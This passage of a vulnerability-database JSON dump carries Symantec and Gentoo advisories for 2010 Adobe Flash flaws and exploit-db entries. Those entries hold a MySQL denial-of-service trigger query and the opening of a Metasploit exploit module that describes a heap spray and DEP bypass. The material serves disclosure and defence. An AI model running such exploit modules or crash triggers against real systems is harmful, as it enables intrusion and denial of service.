amount of privileges required for functionality.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources. \n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources. \n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code.\n\nUpdates are available. Please see the references for more information.\n", "modified": "2010-11-04T00:00:00", "published": "2010-11-04T00:00:00", "id": "SMNTC-44684", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/44684", "type": "symantec", "title": "Adobe Flash Player CVE-2010-3648 Remote Memory Corruption Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-12T10:28:27", "bulletinFamily": "software", "cvelist": ["CVE-2010-3654"], "description": "### Description\n\nAdobe Acrobat, Reader, and Flash are prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. 
The following products are affected: Adobe Flash Player 10.1.85.3 and prior for Windows, Mac OS X, Linux, and Solaris; Adobe Flash Player 10.1.95.2 and prior for Android; Adobe Reader 9.4 and prior for Windows, Mac OS X, and Unix; Adobe Acrobat 9.4 and prior for Windows and Mac OS X.\n\n### Technologies Affected\n\n * Adobe AIR 1.0 \n * Adobe AIR 1.01 \n * Adobe AIR 1.1 \n * Adobe AIR 1.5 \n * Adobe AIR 1.5.1 \n * Adobe AIR 1.5.2 \n * Adobe AIR 1.5.3 \n * Adobe AIR 1.5.3.9120 \n * Adobe AIR 1.5.3.9130 \n * Adobe AIR 2.0.2 \n * Adobe AIR 2.0.2.12610 \n * Adobe AIR 2.0.3 \n * Adobe AIR 2.0.3 \n * Adobe AIR 2.0.4 \n * Adobe Acrobat 9.1.1 \n * Adobe Acrobat 9.2 \n * Adobe Acrobat 9.3 \n * Adobe Acrobat 9.3.1 \n * Adobe Acrobat 9.3.2 \n * Adobe Acrobat 9.3.3 \n * Adobe Acrobat 9.3.3 \n * Adobe Acrobat 9.3.4 \n * Adobe Acrobat 9.3.4 \n * Adobe Acrobat 9.4 \n * Adobe Acrobat Professional 9 \n * Adobe Acrobat Professional 9 Extended \n * Adobe Acrobat Professional 9.1 \n * Adobe Acrobat Professional 9.1.2 \n * Adobe Acrobat Professional 9.1.3 \n * Adobe Acrobat Professional 9.2 \n * Adobe Acrobat Professional 9.3 \n * Adobe Acrobat Professional 9.3.1 \n * Adobe Acrobat Professional 9.3.2 \n * Adobe Acrobat Professional 9.3.3 \n * Adobe Acrobat Professional 9.3.4 \n * Adobe Acrobat Professional 9.4 \n * Adobe Acrobat Reader (for Linux) 9.3.3 \n * Adobe Acrobat Standard 9 \n * Adobe Acrobat Standard 9.1 \n * Adobe Acrobat Standard 9.1.2 \n * Adobe Acrobat Standard 9.1.3 \n * Adobe Acrobat Standard 9.2 \n * Adobe Acrobat Standard 9.3 \n * Adobe Acrobat Standard 9.3.1 \n * Adobe Acrobat Standard 9.3.2 \n * Adobe Acrobat Standard 9.3.3 \n * Adobe Acrobat Standard 9.3.4 \n * Adobe Acrobat Standard 9.3.4 \n * Adobe Acrobat Standard 9.4 \n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.22.87 \n * Adobe 
Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.0.45.2 \n * Adobe Flash Player 10.1 Release Candidate \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7.0.1 \n * Adobe Flash Player 7.0.25 \n * Adobe Flash Player 7.0.63 \n * Adobe Flash Player 7.0.69.0 \n * Adobe Flash Player 7.0.70.0 \n * Adobe Flash Player 7.1 \n * Adobe Flash Player 7.1.1 \n * Adobe Flash Player 7.2 \n * Adobe Flash Player 8 \n * Adobe Flash Player 8.0.22.0 \n * Adobe Flash Player 8.0.24.0 \n * Adobe Flash Player 8.0.33.0 \n * Adobe Flash Player 8.0.34.0 \n * Adobe Flash Player 8.0.35.0 \n * Adobe Flash Player 8.0.39.0 \n * Adobe Flash Player 8.0.42.0 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151 .0 \n * Adobe Flash Player 9.0.152 .0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.18D60 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246 0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.125.0 \n * Adobe Reader 9 \n * Adobe Reader 9.1 \n * Adobe Reader 
9.1.1 \n * Adobe Reader 9.1.2 \n * Adobe Reader 9.1.3 \n * Adobe Reader 9.2 \n * Adobe Reader 9.3 \n * Adobe Reader 9.3.1 \n * Adobe Reader 9.3.2 \n * Adobe Reader 9.3.3 \n * Adobe Reader 9.3.4 \n * Adobe Reader 9.3.4 \n * Adobe Reader 9.4 \n * Apple Mac OS X 10.5 \n * Apple Mac OS X 10.5.0 \n * Apple Mac OS X 10.5.1 \n * Apple Mac OS X 10.5.2 \n * Apple Mac OS X 10.5.3 \n * Apple Mac OS X 10.5.4 \n * Apple Mac OS X 10.5.5 \n * Apple Mac OS X 10.5.6 \n * Apple Mac OS X 10.5.7 \n * Apple Mac OS X 10.5.8 \n * Apple Mac OS X 10.6 \n * Apple Mac OS X 10.6.1 \n * Apple Mac OS X 10.6.2 \n * Apple Mac OS X 10.6.3 \n * Apple Mac OS X 10.6.4 \n * Apple Mac OS X Server 10.5 \n * Apple Mac OS X Server 10.5.0 \n * Apple Mac OS X Server 10.5.1 \n * Apple Mac OS X Server 10.5.2 \n * Apple Mac OS X Server 10.5.3 \n * Apple Mac OS X Server 10.5.4 \n * Apple Mac OS X Server 10.5.5 \n * Apple Mac OS X Server 10.5.6 \n * Apple Mac OS X Server 10.5.7 \n * Apple Mac OS X Server 10.5.8 \n * Apple Mac OS X Server 10.6 \n * Apple Mac OS X Server 10.6.1 \n * Apple Mac OS X Server 10.6.2 \n * Apple Mac OS X Server 10.6.3 \n * Apple Mac OS X Server 10.6.4 \n * Gentoo Linux \n * Google Chrome 5.0.306.0 \n * Google Chrome 5.0.306.1 \n * Google Chrome 5.0.307.1 \n * Google Chrome 5.0.307.10 \n * Google Chrome 5.0.307.11 \n * Google Chrome 5.0.307.3 \n * Google Chrome 5.0.307.4 \n * Google Chrome 5.0.307.5 \n * Google Chrome 5.0.307.6 \n * Google Chrome 5.0.307.7 \n * Google Chrome 5.0.307.8 \n * Google Chrome 5.0.307.9 \n * Google Chrome 5.0.308.0 \n * Google Chrome 5.0.309.0 \n * Google Chrome 5.0.313.0 \n * Google Chrome 5.0.314.0 \n * Google Chrome 5.0.314.1 \n * Google Chrome 5.0.315.0 \n * Google Chrome 5.0.316.0 \n * Google Chrome 5.0.317.0 \n * Google Chrome 5.0.317.1 \n * Google Chrome 5.0.317.2 \n * Google Chrome 5.0.318.0 \n * Google Chrome 5.0.319.0 \n * Google Chrome 5.0.320.0 \n * Google Chrome 5.0.321.0 \n * Google Chrome 5.0.322.0 \n * Google Chrome 5.0.322.1 \n * Google Chrome 
5.0.322.2 \n * Google Chrome 5.0.323.0 \n * Google Chrome 5.0.324.0 \n * Google Chrome 5.0.325.0 \n * Google Chrome 5.0.326.0 \n * Google Chrome 5.0.327.0 \n * Google Chrome 5.0.328.0 \n * Google Chrome 5.0.329.0 \n * Google Chrome 5.0.330.0 \n * Google Chrome 5.0.332.0 \n * Google Chrome 5.0.333.0 \n * Google Chrome 5.0.334.0 \n * Google Chrome 5.0.335.0 \n * Google Chrome 5.0.335.1 \n * Google Chrome 5.0.335.2 \n * Google Chrome 5.0.335.3 \n * Google Chrome 5.0.335.4 \n * Google Chrome 5.0.336.0 \n * Google Chrome 5.0.337.0 \n * Google Chrome 5.0.338.0 \n * Google Chrome 5.0.339.0 \n * Google Chrome 5.0.340.0 \n * Google Chrome 5.0.341.0 \n * Google Chrome 5.0.342.0 \n * Google Chrome 5.0.342.1 \n * Google Chrome 5.0.342.2 \n * Google Chrome 5.0.342.3 \n * Google Chrome 5.0.342.4 \n * Google Chrome 5.0.342.5 \n * Google Chrome 5.0.342.6 \n * Google Chrome 5.0.342.7 \n * Google Chrome 5.0.342.8 \n * Google Chrome 5.0.342.9 \n * Google Chrome 5.0.343.0 \n * Google Chrome 5.0.344.0 \n * Google Chrome 5.0.345.0 \n * Google Chrome 5.0.346.0 \n * Google Chrome 5.0.347.0 \n * Google Chrome 5.0.348.0 \n * Google Chrome 5.0.349.0 \n * Google Chrome 5.0.350.0 \n * Google Chrome 5.0.350.1 \n * Google Chrome 5.0.351.0 \n * Google Chrome 5.0.353.0 \n * Google Chrome 5.0.354.0 \n * Google Chrome 5.0.354.1 \n * Google Chrome 5.0.355.0 \n * Google Chrome 5.0.356.0 \n * Google Chrome 5.0.356.1 \n * Google Chrome 5.0.356.2 \n * Google Chrome 5.0.357.0 \n * Google Chrome 5.0.358.0 \n * Google Chrome 5.0.359.0 \n * Google Chrome 5.0.360.0 \n * Google Chrome 5.0.360.3 \n * Google Chrome 5.0.360.4 \n * Google Chrome 5.0.360.5 \n * Google Chrome 5.0.361.0 \n * Google Chrome 5.0.362.0 \n * Google Chrome 5.0.363.0 \n * Google Chrome 5.0.364.0 \n * Google Chrome 5.0.365.0 \n * Google Chrome 5.0.366.0 \n * Google Chrome 5.0.366.1 \n * Google Chrome 5.0.366.2 \n * Google Chrome 5.0.366.3 \n * Google Chrome 5.0.366.4 \n * Google Chrome 5.0.367.0 \n * Google Chrome 5.0.368.0 \n * Google 
Chrome 5.0.369.0 \n * Google Chrome 5.0.369.1 \n * Google Chrome 5.0.369.2 \n * Google Chrome 5.0.370.0 \n * Google Chrome 5.0.371.0 \n * Google Chrome 5.0.372.0 \n * Google Chrome 5.0.373.0 \n * Google Chrome 5.0.374.0 \n * Google Chrome 5.0.375.0 \n * Google Chrome 5.0.375.1 \n * Google Chrome 5.0.375.10 \n * Google Chrome 5.0.375.11 \n * Google Chrome 5.0.375.12 \n * Google Chrome 5.0.375.125 \n * Google Chrome 5.0.375.125 \n * Google Chrome 5.0.375.126 \n * Google Chrome 5.0.375.127 \n * Google Chrome 5.0.375.13 \n * Google Chrome 5.0.375.14 \n * Google Chrome 5.0.375.15 \n * Google Chrome 5.0.375.16 \n * Google Chrome 5.0.375.17 \n * Google Chrome 5.0.375.18 \n * Google Chrome 5.0.375.19 \n * Google Chrome 5.0.375.2 \n * Google Chrome 5.0.375.20 \n * Google Chrome 5.0.375.21 \n * Google Chrome 5.0.375.22 \n * Google Chrome 5.0.375.23 \n * Google Chrome 5.0.375.25 \n * Google Chrome 5.0.375.26 \n * Google Chrome 5.0.375.27 \n * Google Chrome 5.0.375.28 \n * Google Chrome 5.0.375.29 \n * Google Chrome 5.0.375.3 \n * Google Chrome 5.0.375.30 \n * Google Chrome 5.0.375.31 \n * Google Chrome 5.0.375.32 \n * Google Chrome 5.0.375.33 \n * Google Chrome 5.0.375.34 \n * Google Chrome 5.0.375.35 \n * Google Chrome 5.0.375.36 \n * Google Chrome 5.0.375.37 \n * Google Chrome 5.0.375.38 \n * Google Chrome 5.0.375.39 \n * Google Chrome 5.0.375.4 \n * Google Chrome 5.0.375.40 \n * Google Chrome 5.0.375.41 \n * Google Chrome 5.0.375.42 \n * Google Chrome 5.0.375.43 \n * Google Chrome 5.0.375.44 \n * Google Chrome 5.0.375.45 \n * Google Chrome 5.0.375.46 \n * Google Chrome 5.0.375.47 \n * Google Chrome 5.0.375.48 \n * Google Chrome 5.0.375.49 \n * Google Chrome 5.0.375.5 \n * Google Chrome 5.0.375.50 \n * Google Chrome 5.0.375.51 \n * Google Chrome 5.0.375.52 \n * Google Chrome 5.0.375.53 \n * Google Chrome 5.0.375.54 \n * Google Chrome 5.0.375.55 \n * Google Chrome 5.0.375.56 \n * Google Chrome 5.0.375.57 \n * Google Chrome 5.0.375.58 \n * Google Chrome 5.0.375.59 \n * Google 
Chrome 5.0.375.6 \n * Google Chrome 5.0.375.60 \n * Google Chrome 5.0.375.61 \n * Google Chrome 5.0.375.62 \n * Google Chrome 5.0.375.63 \n * Google Chrome 5.0.375.64 \n * Google Chrome 5.0.375.65 \n * Google Chrome 5.0.375.66 \n * Google Chrome 5.0.375.67 \n * Google Chrome 5.0.375.68 \n * Google Chrome 5.0.375.69 \n * Google Chrome 5.0.375.7 \n * Google Chrome 5.0.375.70 \n * Google Chrome 5.0.375.71 \n * Google Chrome 5.0.375.72 \n * Google Chrome 5.0.375.73 \n * Google Chrome 5.0.375.74 \n * Google Chrome 5.0.375.75 \n * Google Chrome 5.0.375.76 \n * Google Chrome 5.0.375.77 \n * Google Chrome 5.0.375.78 \n * Google Chrome 5.0.375.79 \n * Google Chrome 5.0.375.8 \n * Google Chrome 5.0.375.80 \n * Google Chrome 5.0.375.81 \n * Google Chrome 5.0.375.82 \n * Google Chrome 5.0.375.83 \n * Google Chrome 5.0.375.84 \n * Google Chrome 5.0.375.85 \n * Google Chrome 5.0.375.86 \n * Google Chrome 5.0.375.86 \n * Google Chrome 5.0.375.87 \n * Google Chrome 5.0.375.88 \n * Google Chrome 5.0.375.89 \n * Google Chrome 5.0.375.9 \n * Google Chrome 5.0.375.90 \n * Google Chrome 5.0.375.91 \n * Google Chrome 5.0.375.92 \n * Google Chrome 5.0.375.93 \n * Google Chrome 5.0.375.94 \n * Google Chrome 5.0.375.95 \n * Google Chrome 5.0.375.96 \n * Google Chrome 5.0.375.97 \n * Google Chrome 5.0.375.98 \n * Google Chrome 5.0.375.99 \n * Google Chrome 5.0.375.99 \n * Google Chrome 5.0.376.0 \n * Google Chrome 5.0.378.0 \n * Google Chrome 5.0.379.0 \n * Google Chrome 5.0.380.0 \n * Google Chrome 5.0.381.0 \n * Google Chrome 5.0.382.0 \n * Google Chrome 5.0.382.3 \n * Google Chrome 5.0.383.0 \n * Google Chrome 5.0.384.0 \n * Google Chrome 5.0.385.0 \n * Google Chrome 5.0.386.0 \n * Google Chrome 5.0.387.0 \n * Google Chrome 5.0.390.0 \n * Google Chrome 5.0.391.0 \n * Google Chrome 5.0.392.0 \n * Google Chrome 5.0.393.0 \n * Google Chrome 5.0.394.0 \n * Google Chrome 5.0.395.0 \n * Google Chrome 5.0.396.0 \n * Google Chrome 6.0.397.0 \n * Google Chrome 6.0.398.0 \n * Google Chrome 
6.0.399.0 \n * Google Chrome 6.0.400.0 \n * Google Chrome 6.0.401.0 \n * Google Chrome 6.0.401.1 \n * Google Chrome 6.0.403.0 \n * Google Chrome 6.0.404.0 \n * Google Chrome 6.0.404.1 \n * Google Chrome 6.0.404.2 \n * Google Chrome 6.0.405.0 \n * Google Chrome 6.0.406.0 \n * Google Chrome 6.0.407.0 \n * Google Chrome 6.0.408.0 \n * Google Chrome 6.0.408.1 \n * Google Chrome 6.0.408.10 \n * Google Chrome 6.0.408.2 \n * Google Chrome 6.0.408.3 \n * Google Chrome 6.0.408.4 \n * Google Chrome 6.0.408.5 \n * Google Chrome 6.0.408.6 \n * Google Chrome 6.0.408.7 \n * Google Chrome 6.0.408.8 \n * Google Chrome 6.0.408.9 \n * Google Chrome 6.0.409.0 \n * Google Chrome 6.0.410.0 \n * Google Chrome 6.0.411.0 \n * Google Chrome 6.0.412.0 \n * Google Chrome 6.0.413.0 \n * Google Chrome 6.0.414.0 \n * Google Chrome 6.0.415.0 \n * Google Chrome 6.0.415.1 \n * Google Chrome 6.0.416.0 \n * Google Chrome 6.0.416.1 \n * Google Chrome 6.0.417.0 \n * Google Chrome 6.0.418.0 \n * Google Chrome 6.0.418.1 \n * Google Chrome 6.0.418.2 \n * Google Chrome 6.0.418.3 \n * Google Chrome 6.0.418.4 \n * Google Chrome 6.0.418.5 \n * Google Chrome 6.0.418.6 \n * Google Chrome 6.0.418.7 \n * Google Chrome 6.0.418.8 \n * Google Chrome 6.0.418.9 \n * Google Chrome 6.0.419.0 \n * Google Chrome 6.0.421.0 \n * Google Chrome 6.0.422.0 \n * Google Chrome 6.0.423.0 \n * Google Chrome 6.0.424.0 \n * Google Chrome 6.0.425.0 \n * Google Chrome 6.0.426.0 \n * Google Chrome 6.0.427.0 \n * Google Chrome 6.0.428.0 \n * Google Chrome 6.0.430.0 \n * Google Chrome 6.0.431.0 \n * Google Chrome 6.0.432.0 \n * Google Chrome 6.0.433.0 \n * Google Chrome 6.0.434.0 \n * Google Chrome 6.0.435.0 \n * Google Chrome 6.0.436.0 \n * Google Chrome 6.0.437.0 \n * Google Chrome 6.0.437.1 \n * Google Chrome 6.0.437.2 \n * Google Chrome 6.0.437.3 \n * Google Chrome 6.0.438.0 \n * Google Chrome 6.0.440.0 \n * Google Chrome 6.0.441.0 \n * Google Chrome 6.0.443.0 \n * Google Chrome 6.0.444.0 \n * Google Chrome 6.0.445.0 \n * Google 
Chrome 6.0.445.1 \n * Google Chrome 6.0.446.0 \n * Google Chrome 6.0.447.0 \n * Google Chrome 6.0.447.1 \n * Google Chrome 6.0.447.2 \n * Google Chrome 6.0.449.0 \n * Google Chrome 6.0.450.0 \n * Google Chrome 6.0.450.1 \n * Google Chrome 6.0.450.2 \n * Google Chrome 6.0.450.3 \n * Google Chrome 6.0.450.4 \n * Google Chrome 6.0.451.0 \n * Google Chrome 6.0.452.0 \n * Google Chrome 6.0.452.1 \n * Google Chrome 6.0.453.0 \n * Google Chrome 6.0.453.1 \n * Google Chrome 6.0.454.0 \n * Google Chrome 6.0.455.0 \n * Google Chrome 6.0.456.0 \n * Google Chrome 6.0.457.0 \n * Google Chrome 6.0.458.0 \n * Google Chrome 6.0.458.1 \n * Google Chrome 6.0.458.2 \n * Google Chrome 6.0.459.0 \n * Google Chrome 6.0.460.0 \n * Google Chrome 6.0.461.0 \n * Google Chrome 6.0.462.0 \n * Google Chrome 6.0.464.1 \n * Google Chrome 6.0.465.1 \n * Google Chrome 6.0.465.2 \n * Google Chrome 6.0.466.0 \n * Google Chrome 6.0.466.1 \n * Google Chrome 6.0.466.2 \n * Google Chrome 6.0.466.3 \n * Google Chrome 6.0.466.4 \n * Google Chrome 6.0.466.5 \n * Google Chrome 6.0.466.6 \n * Google Chrome 6.0.467.0 \n * Google Chrome 6.0.469.0 \n * Google Chrome 6.0.470.0 \n * Google Chrome 6.0.471.0 \n * Google Chrome 6.0.472.0 \n * Google Chrome 6.0.472.1 \n * Google Chrome 6.0.472.10 \n * Google Chrome 6.0.472.11 \n * Google Chrome 6.0.472.12 \n * Google Chrome 6.0.472.13 \n * Google Chrome 6.0.472.14 \n * Google Chrome 6.0.472.15 \n * Google Chrome 6.0.472.16 \n * Google Chrome 6.0.472.17 \n * Google Chrome 6.0.472.18 \n * Google Chrome 6.0.472.19 \n * Google Chrome 6.0.472.2 \n * Google Chrome 6.0.472.20 \n * Google Chrome 6.0.472.21 \n * Google Chrome 6.0.472.22 \n * Google Chrome 6.0.472.23 \n * Google Chrome 6.0.472.24 \n * Google Chrome 6.0.472.25 \n * Google Chrome 6.0.472.26 \n * Google Chrome 6.0.472.27 \n * Google Chrome 6.0.472.28 \n * Google Chrome 6.0.472.29 \n * Google Chrome 6.0.472.3 \n * Google Chrome 6.0.472.30 \n * Google Chrome 6.0.472.31 \n * Google Chrome 6.0.472.32 \n * Google 
Chrome 6.0.472.33 \n * Google Chrome 6.0.472.34 \n * Google Chrome 6.0.472.35 \n * Google Chrome 6.0.472.36 \n * Google Chrome 6.0.472.37 \n * Google Chrome 6.0.472.38 \n * Google Chrome 6.0.472.39 \n * Google Chrome 6.0.472.4 \n * Google Chrome 6.0.472.40 \n * Google Chrome 6.0.472.41 \n * Google Chrome 6.0.472.42 \n * Google Chrome 7.0.517.41 \n * Macromedia Flash 5.0.0 R50 \n * Macromedia Flash 5.0.0 \n * Macromedia Flash 6.0.0 \n * Macromedia Flash 6.0.29 .0 \n * Macromedia Flash 6.0.40 .0 \n * Macromedia Flash 6.0.47 .0 \n * Macromedia Flash 6.0.65 .0 \n * Macromedia Flash 6.0.79 .0 \n * Redhat Desktop Extras 4 \n * Redhat Enterprise Linux AS Extras 4 \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux ES Extras 4 \n * Redhat Enterprise Linux Extras 4 \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux WS Extras 4 \n * Redhat Enterprise Linux Workstation Supplementary 6 \n * SuSE Suse Linux Enterprise Desktop 10 SP3 \n * SuSE Suse Linux Enterprise Desktop 11 \n * SuSE Suse Linux Enterprise Desktop 11 SP1 \n * SuSE openSUSE 11.1 \n * SuSE openSUSE 11.2 \n * SuSE openSUSE 11.3 \n * Sun Solaris 10 Sparc \n * Sun Solaris 10 X86 \n * Sun Solaris 11 \n * Sun Solaris 11 Express \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. 
\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nAs an added precaution, deploy memory-protection schemes (such as nonexecutable stack/heap configuration and randomly mapped memory segments). This may complicate exploits of memory-corruption vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. Please see the references for more information.\n", "modified": "2010-10-28T00:00:00", "published": "2010-10-28T00:00:00", "id": "SMNTC-44504", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/44504", "type": "symantec", "title": "Adobe Acrobat, Reader, and Flash CVE-2010-3654 Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:31", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2215", "CVE-2010-3648", "CVE-2008-4546", "CVE-2010-2160", "CVE-2010-3640", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-3644", "CVE-2010-3639", "CVE-2010-3654", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-0186", "CVE-2010-2884", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-3645", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-3652", "CVE-2010-3636", "CVE-2010-3641", "CVE-2010-0187", "CVE-2010-2181", "CVE-2010-2163", 
"CVE-2010-3976", "CVE-2010-2183", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2213", "CVE-2010-3650", "CVE-2010-2179", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2214", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-3647", "CVE-2010-3643", "CVE-2010-2162", "CVE-2010-3646", "CVE-2010-3642", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-3649", "CVE-2010-2178"], "edition": 1, "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities were discovered in Adobe Flash Player. For further information please consult the CVE entries and the Adobe Security Bulletins referenced below. \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted SWF file, possibly resulting in the execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest stable version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-plugins/adobe-flash-10.1.102.64\"", "modified": "2011-01-21T00:00:00", "published": "2011-01-21T00:00:00", "id": "GLSA-201101-09", "href": "https://security.gentoo.org/glsa/201101-09", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-03T23:25:12", "description": "Oracle MySQL Prior to 5.1.49 'DDL' Statements Denial Of Service Vulnerability. CVE-2010-3676 . 
Dos exploit for linux platform", "published": "2010-07-09T00:00:00", "type": "exploitdb", "title": "Oracle MySQL < 5.1.49 - 'DDL' Statements Denial Of Service Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3676"], "modified": "2010-07-09T00:00:00", "id": "EDB-ID:34522", "href": "https://www.exploit-db.com/exploits/34522/", "sourceData": "source: http://www.securityfocus.com/bid/42643/info\r\n\r\nMySQL is prone to a denial-of-service vulnerability.\r\n\r\nAn attacker can exploit this issue to crash the database, denying access to legitimate users.\r\n\r\nVersions prior to MySQL 5.1.49 are vulnerable.\r\n\r\nNOTE: This issue was previously disclosed in BID 42586 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been assigned its own record. \r\n\r\nthd->query at 0x14bcdf0 = CREATE TEMPORARY TABLE operations ( op VARCHAR(16) ) ENGINE =InnoDB ", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34522/"}, {"lastseen": "2016-02-02T06:13:34", "description": "Adobe Flash Player \"Button\" Remote Code Execution. CVE-2010-3654. Local exploit for windows platform", "published": "2010-11-01T00:00:00", "type": "exploitdb", "title": "Adobe Flash Player \"Button\" Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3654"], "modified": "2010-11-01T00:00:00", "id": "EDB-ID:16667", "href": "https://www.exploit-db.com/exploits/16667/", "sourceData": "##\r\n# $Id: adobe_flashplayer_button.rb 10857 2010-11-01 22:34:13Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Flash Player \"Button\" Remote Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the handling of certain SWF movies\r\n\t\t\t\twithin versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat\r\n\t\t\t\tare also vulnerable, as are any other applications that may embed Flash player.\r\n\r\n\t\t\t\tArbitrary code execution is achieved by embedding a specially crafted Flash\r\n\t\t\t\tmovie into a PDF document. An AcroJS heap spray is used in order to ensure\r\n\t\t\t\tthat the memory used by the invalid pointer issue is controlled.\r\n\r\n\t\t\t\tNOTE: This module uses a similar DEP bypass method to that used within the\r\n\t\t\t\tadobe_libtiff module. 
